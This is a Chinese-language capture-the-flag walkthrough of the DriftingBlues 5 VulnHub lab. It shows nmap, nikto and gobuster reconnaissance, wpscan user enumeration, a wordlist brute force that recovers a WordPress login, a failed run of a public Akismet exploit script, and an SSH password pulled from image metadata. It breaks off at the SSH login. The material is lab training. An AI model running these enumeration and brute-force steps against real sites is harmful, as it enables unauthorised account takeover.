Driftingblues 5
识别目标主机IP地址
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue5]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.124.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:dd:4f:27 1 60 PCS Systemtechnik GmbH
192.168.56.194 08:00:27:dc:cc:5b 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.194
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue5]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.194 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-19 21:06 EST
Nmap scan report for localhost (192.168.56.194)
Host is up (0.00011s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
| 256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
|_ 256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-generator: WordPress 5.6.2
|_http-title: diary – Just another WordPress site
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:DC:CC:5B (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.71 seconds
NMAP扫描结果表明目标主机有2个开放端口22(SSH)、80(HTTP服务)
Get Access
浏览器访问80端口,目标主机返回页面,是一个wordpress站点。
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue5]
└─$ curl http://192.168.56.194/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.194 Port 80</address>
</body></html>
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue5]
└─$ nikto -h http://192.168.56.194
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.194
+ Target Hostname: 192.168.56.194
+ Target Port: 80
+ Start Time: 2022-11-19 21:55:46 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://192.168.56.194/index.php/wp-json/>; rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /: A Wordpress installation was found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ OSVDB-3268: /wp-content/uploads/: Directory indexing found.
+ /wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information
+ /wp-login.php: Wordpress login found
+ 7915 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time: 2022-11-19 21:56:40 (GMT-5) (54 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to [email protected]) (y/n)?
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue5]
└─$ gobuster dir -u http://192.168.56.194 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.194
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/19 21:57:23 Starting gobuster in directory enumeration mode
===============================================================
/wp-content (Status: 301) [Size: 321] [--> http://192.168.56.194/wp-content/]
/wp-includes (Status: 301) [Size: 322] [--> http://192.168.56.194/wp-includes/]
/wp-admin (Status: 301) [Size: 319] [--> http://192.168.56.194/wp-admin/]
/server-status (Status: 403) [Size: 279]
Progress: 217863 / 220561 (98.78%)===============================================================
2022/11/19 21:57:54 Finished
===============================================================
接下来用wpscan工具扫描一下目标站点,看是否可以扫描出用户名以及插件
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue5]
└─$ wpscan --url http://192.168.56.194 -e u,p
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.194/ [192.168.56.194]
[+] Started: Sat Nov 19 22:00:12 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.38 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.56.194/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.56.194/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.56.194/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.56.194/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.6.2 identified (Insecure, released on 2021-02-22).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.56.194/index.php/feed/, <generator>https://wordpress.org/?v=5.6.2</generator>
| - http://192.168.56.194/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.6.2</generator>
[+] WordPress theme in use: twentytwentyone
| Location: http://192.168.56.194/wp-content/themes/twentytwentyone/
| Last Updated: 2022-05-24T00:00:00.000Z
| Readme: http://192.168.56.194/wp-content/themes/twentytwentyone/readme.txt
| [!] The version is out of date, the latest version is 1.6
| Style URL: http://192.168.56.194/wp-content/themes/twentytwentyone/style.css?ver=1.1
| Style Name: Twenty Twenty-One
| Style URI: https://wordpress.org/themes/twentytwentyone/
| Description: Twenty Twenty-One is a blank canvas for your ideas and it makes the block editor your best brush. Wi...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.1 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.56.194/wp-content/themes/twentytwentyone/style.css?ver=1.1, Match: 'Version: 1.1'
[+] Enumerating Most Popular Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <====================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] abuzerkomurcu
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://192.168.56.194/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] gill
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] collins
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] satanic
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] gadd
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sat Nov 19 22:00:15 2022
[+] Requests Done: 66
[+] Cached Requests: 11
[+] Data Sent: 17.126 KB
[+] Data Received: 672.149 KB
[+] Memory used: 242.973 MB
[+] Elapsed time: 00:00:03
识别出来了一些用户名,abuzerkomurcu应该是管理员,因此看一下能否破解他的密码:
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue5]
└─$ wpscan --url http://192.168.56.194 -U abuzerkomurcu -P /usr/share/wordlists/rockyou.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.194/ [192.168.56.194]
[+] Started: Sat Nov 19 22:11:19 2022
但是跑了很久,都没有破解出来,只能换一个方向,看一下有无插件?
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue5]
└─$ wpscan --url http://192.168.56.194 --plugins-detection mixed
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.194/ [192.168.56.194]
[+] Started: Sat Nov 19 22:31:57 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.38 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.56.194/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.56.194/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.56.194/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.56.194/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.6.2 identified (Insecure, released on 2021-02-22).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.56.194/index.php/feed/, <generator>https://wordpress.org/?v=5.6.2</generator>
| - http://192.168.56.194/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.6.2</generator>
[+] WordPress theme in use: twentytwentyone
| Location: http://192.168.56.194/wp-content/themes/twentytwentyone/
| Last Updated: 2022-05-24T00:00:00.000Z
| Readme: http://192.168.56.194/wp-content/themes/twentytwentyone/readme.txt
| [!] The version is out of date, the latest version is 1.6
| Style URL: http://192.168.56.194/wp-content/themes/twentytwentyone/style.css?ver=1.1
| Style Name: Twenty Twenty-One
| Style URI: https://wordpress.org/themes/twentytwentyone/
| Description: Twenty Twenty-One is a blank canvas for your ideas and it makes the block editor your best brush. Wi...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.1 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.56.194/wp-content/themes/twentytwentyone/style.css?ver=1.1, Match: 'Version: 1.1'
[+] Enumerating All Plugins (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:02:07 <=============================================================================================================================================> (100906 / 100906) 100.00% Time: 00:02:07
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] akismet
| Location: http://192.168.56.194/wp-content/plugins/akismet/
| Last Updated: 2022-09-28T15:27:00.000Z
| Readme: http://192.168.56.194/wp-content/plugins/akismet/readme.txt
| [!] The version is out of date, the latest version is 5.0.1
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.56.194/wp-content/plugins/akismet/, status: 200
|
| Version: 4.1.8 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.56.194/wp-content/plugins/akismet/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.56.194/wp-content/plugins/akismet/readme.txt
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <====================================================================================================================================================> (137 / 137) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sat Nov 19 22:34:15 2022
[+] Requests Done: 101080
[+] Cached Requests: 7
[+] Data Sent: 27.034 MB
[+] Data Received: 13.932 MB
[+] Memory used: 523.148 MB
[+] Elapsed time: 00:02:18
识别出插件akismet,版本较老,看一下有没有可利用的漏洞
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue5]
└─$ php 37902.php http://192.168.56.194
source: https://www.securityfocus.com/bid/55749/info
The Akismet plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
#!/usr/bin/php -f
PHP Fatal error: Uncaught Error: Call to undefined function curl_init() in /home/kali/Vulnhub/Driftingblue5/37902.php:19
Stack trace:
#0 {main}
thrown in /home/kali/Vulnhub/Driftingblue5/37902.php on line 19
执行代码出错,这是因为没有安装Php-curl
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue5]
└─$ sudo apt install php-curl
[sudo] password for kali:
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following additional packages will be installed:
libapache2-mod-php libapache2-mod-php8.1 php php-common php-mysql php8.1 php8.1-cli php8.1-common php8.1-curl php8.1-mysql php8.1-opcache php8.1-readline
Suggested packages:
php-pear
The following NEW packages will be installed:
php-curl php8.1-curl
The following packages will be upgraded:
libapache2-mod-php libapache2-mod-php8.1 php php-common php-mysql php8.1 php8.1-cli php8.1-common php8.1-mysql php8.1-opcache php8.1-readline
11 upgraded, 2 newly installed, 0 to remove and 1322 not upgraded.
Need to get 4,556 kB of archives.
After this operation, 153 kB disk space will be freed.
Do you want to continue? [Y/n] y
Get:1 https://mirrors.aliyun.com/kali kali-rolling/main amd64 php-common all 2:92+nmu1 [13.2 kB]
Get:2 https://mirrors.aliyun.com/kali kali-rolling/main amd64 php8.1-readline amd64 8.1.12-1+b1 [12.4 kB]
Get:3 https://mirrors.aliyun.com/kali kali-rolling/main amd64 php8.1-opcache amd64 8.1.12-1+b1 [344 kB]
Get:4 https://mirrors.aliyun.com/kali kali-rolling/main amd64 php8.1-mysql amd64 8.1.12-1+b1 [116 kB]
Get:5 https://mirrors.aliyun.com/kali kali-rolling/main amd64 libapache2-mod-php8.1 amd64 8.1.12-1+b1 [1,639 kB]
Get:6 https://mirrors.aliyun.com/kali kali-rolling/main amd64 php8.1-cli amd64 8.1.12-1+b1 [1,694 kB]
Get:7 https://mirrors.aliyun.com/kali kali-rolling/main amd64 php8.1-common amd64 8.1.12-1+b1 [662 kB]
Get:8 https://mirrors.aliyun.com/kali kali-rolling/main amd64 libapache2-mod-php all 2:8.1+92+nmu1 [3,824 B]
Get:9 https://mirrors.aliyun.com/kali kali-rolling/main amd64 php8.1 all 8.1.12-1 [26.1 kB]
Get:10 https://mirrors.aliyun.com/kali kali-rolling/main amd64 php all 2:8.1+92+nmu1 [3,696 B]
Get:11 https://mirrors.aliyun.com/kali kali-rolling/main amd64 php8.1-curl amd64 8.1.12-1+b1 [34.1 kB]
Get:12 https://mirrors.aliyun.com/kali kali-rolling/main amd64 php-curl all 2:8.1+92+nmu1 [3,720 B]
Get:13 https://mirrors.aliyun.com/kali kali-rolling/main amd64 php-mysql all 2:8.1+92+nmu1 [3,720 B]
Fetched 4,556 kB in 13s (352 kB/s)
(Reading database ... 350461 files and directories currently installed.)
Preparing to unpack .../00-php-common_2%3a92+nmu1_all.deb ...
Unpacking php-common (2:92+nmu1) over (2:92) ...
Preparing to unpack .../01-php8.1-readline_8.1.12-1+b1_amd64.deb ...
Unpacking php8.1-readline (8.1.12-1+b1) over (8.1.5-1+b1) ...
Preparing to unpack .../02-php8.1-opcache_8.1.12-1+b1_amd64.deb ...
Unpacking php8.1-opcache (8.1.12-1+b1) over (8.1.5-1+b1) ...
Preparing to unpack .../03-php8.1-mysql_8.1.12-1+b1_amd64.deb ...
Unpacking php8.1-mysql (8.1.12-1+b1) over (8.1.5-1+b1) ...
Preparing to unpack .../04-libapache2-mod-php8.1_8.1.12-1+b1_amd64.deb ...
Unpacking libapache2-mod-php8.1 (8.1.12-1+b1) over (8.1.5-1+b1) ...
Preparing to unpack .../05-php8.1-cli_8.1.12-1+b1_amd64.deb ...
Unpacking php8.1-cli (8.1.12-1+b1) over (8.1.5-1+b1) ...
Preparing to unpack .../06-php8.1-common_8.1.12-1+b1_amd64.deb ...
Unpacking php8.1-common (8.1.12-1+b1) over (8.1.5-1+b1) ...
Preparing to unpack .../07-libapache2-mod-php_2%3a8.1+92+nmu1_all.deb ...
Unpacking libapache2-mod-php (2:8.1+92+nmu1) over (2:8.1+92) ...
Preparing to unpack .../08-php8.1_8.1.12-1_all.deb ...
Unpacking php8.1 (8.1.12-1) over (8.1.5-1) ...
Preparing to unpack .../09-php_2%3a8.1+92+nmu1_all.deb ...
Unpacking php (2:8.1+92+nmu1) over (2:8.1+92) ...
Selecting previously unselected package php8.1-curl.
Preparing to unpack .../10-php8.1-curl_8.1.12-1+b1_amd64.deb ...
Unpacking php8.1-curl (8.1.12-1+b1) ...
Selecting previously unselected package php-curl.
Preparing to unpack .../11-php-curl_2%3a8.1+92+nmu1_all.deb ...
Unpacking php-curl (2:8.1+92+nmu1) ...
Preparing to unpack .../12-php-mysql_2%3a8.1+92+nmu1_all.deb ...
Unpacking php-mysql (2:8.1+92+nmu1) over (2:8.1+92) ...
Setting up php-common (2:92+nmu1) ...
Setting up php8.1-common (8.1.12-1+b1) ...
Setting up php8.1-curl (8.1.12-1+b1) ...
Creating config file /etc/php/8.1/mods-available/curl.ini with new version
Setting up php8.1-mysql (8.1.12-1+b1) ...
Setting up php8.1-readline (8.1.12-1+b1) ...
Setting up php8.1-opcache (8.1.12-1+b1) ...
Setting up php-curl (2:8.1+92+nmu1) ...
Setting up php-mysql (2:8.1+92+nmu1) ...
Setting up php8.1-cli (8.1.12-1+b1) ...
Setting up libapache2-mod-php8.1 (8.1.12-1+b1) ...
Installing new version of config file /etc/apache2/mods-available/php8.1.conf ...
libapache2-mod-php8.1: not switching MPM - already enabled
Setting up php8.1 (8.1.12-1) ...
Setting up libapache2-mod-php (2:8.1+92+nmu1) ...
Setting up php (2:8.1+92+nmu1) ...
Processing triggers for man-db (2.10.2-1) ...
Processing triggers for kali-menu (2022.3.1) ...
Processing triggers for php8.1-cli (8.1.12-1+b1) ...
Processing triggers for libapache2-mod-php8.1 (8.1.12-1+b1) ...
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue5]
└─$ php 37902.php 192.168.56.194
source: https://www.securityfocus.com/bid/55749/info
The Akismet plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
#!/usr/bin/php -f
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at 127.0.1.1 Port 80</address>
</body></html>
这次可以执行代码,但是返回结果有问题,仔细再看一下这个exploit代码,行不通呀。
看了一下别人的,还是需要从破解用户名密码的思路着手。
不能用现成的密码字典,需要用cewl工作生成自己的字典
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue5]
└─$ wpscan --url http://192.168.56.194 -P pass_wordlist
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.194/ [192.168.56.194]
[+] Started: Sat Nov 19 23:04:32 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.38 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.56.194/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.56.194/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.56.194/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.56.194/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.6.2 identified (Insecure, released on 2021-02-22).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.56.194/index.php/feed/, <generator>https://wordpress.org/?v=5.6.2</generator>
| - http://192.168.56.194/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.6.2</generator>
[+] WordPress theme in use: twentytwentyone
| Location: http://192.168.56.194/wp-content/themes/twentytwentyone/
| Last Updated: 2022-05-24T00:00:00.000Z
| Readme: http://192.168.56.194/wp-content/themes/twentytwentyone/readme.txt
| [!] The version is out of date, the latest version is 1.6
| Style URL: http://192.168.56.194/wp-content/themes/twentytwentyone/style.css?ver=1.1
| Style Name: Twenty Twenty-One
| Style URI: https://wordpress.org/themes/twentytwentyone/
| Description: Twenty Twenty-One is a blank canvas for your ideas and it makes the block editor your best brush. Wi...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.1 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.56.194/wp-content/themes/twentytwentyone/style.css?ver=1.1, Match: 'Version: 1.1'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <======================================================================================================================================================> (137 / 137) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <=======================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] abuzerkomurcu
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://192.168.56.194/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] gill
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] collins
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] satanic
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] gadd
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] Performing password attack on Wp Login against 5 user/s
[SUCCESS] - gill / interchangeable
Trying gadd / Category Time: 00:00:59 <============================================================================================================================= > (7315 / 8825) 82.88% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: gill, Password: interchangeable
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sat Nov 19 23:05:35 2022
[+] Requests Done: 7520
[+] Cached Requests: 11
[+] Data Sent: 2.456 MB
[+] Data Received: 52.755 MB
[+] Memory used: 311.098 MB
[+] Elapsed time: 00:01:02
成功破解出来一个用户名的密码,登录一下:
成功登录wordpress后台,
发现了一张在前台没有看到的图片,下载到Kali Linux本地进行分析,是一个png文件,先用exiftool工具分析一下
──(kali㉿kali)-[~/Vulnhub/Driftingblue5]
└─$ exiftool dblogo.png
ExifTool Version Number : 12.44
File Name : dblogo.png
Directory : .
File Size : 19 kB
File Modification Date/Time : 2022:11:19 23:08:35-05:00
File Access Date/Time : 2022:11:19 23:08:35-05:00
File Inode Change Date/Time : 2022:11:19 23:08:35-05:00
File Permissions : -rw-r--r--
File Type : PNG
File Type Extension : png
MIME Type : image/png
Image Width : 300
Image Height : 300
Bit Depth : 8
Color Type : RGB with Alpha
Compression : Deflate/Inflate
Filter : Adaptive
Interlace : Noninterlaced
SRGB Rendering : Perceptual
Gamma : 2.2
Pixels Per Unit X : 2835
Pixels Per Unit Y : 2835
Pixel Units : meters
XMP Toolkit : Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39
Creator Tool : Adobe Photoshop CC 2018 (Windows)
Create Date : 2021:02:24 02:55:28+03:00
Metadata Date : 2021:02:24 02:55:28+03:00
Modify Date : 2021:02:24 02:55:28+03:00
Instance ID : xmp.iid:562b80d4-fe12-8541-ae0c-6a21e7859405
Document ID : adobe:docid:photoshop:7232d876-a1d0-044b-9604-08837143888b
Original Document ID : xmp.did:5890be6c-649b-0248-af9b-19889727200c
Color Mode : RGB
ICC Profile Name : sRGB IEC61966-2.1
Format : image/png
History Action : created, saved
History Instance ID : xmp.iid:5890be6c-649b-0248-af9b-19889727200c, xmp.iid:562b80d4-fe12-8541-ae0c-6a21e7859405
History When : 2021:02:24 02:55:28+03:00, 2021:02:24 02:55:28+03:00
History Software Agent : Adobe Photoshop CC 2018 (Windows), Adobe Photoshop CC 2018 (Windows)
History Changed : /
Text Layer Name : ssh password is 59583hello of course it is lowercase maybe not
Text Layer Text : ssh password is 59583hello of course it is lowercase maybe not :)
Document Ancestors : adobe:docid:photoshop:871a8adf-5521-894c-8a18-2b27c91a893b
Image Size : 300x300
Megapixels : 0.090
这张图片竟然隐藏了ssh的密码,那接下去登录SSH
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue5]
└─$ ssh [email protected]
The authenticity of host '192.168.56.194 (192.168.56.194)' can't be established.
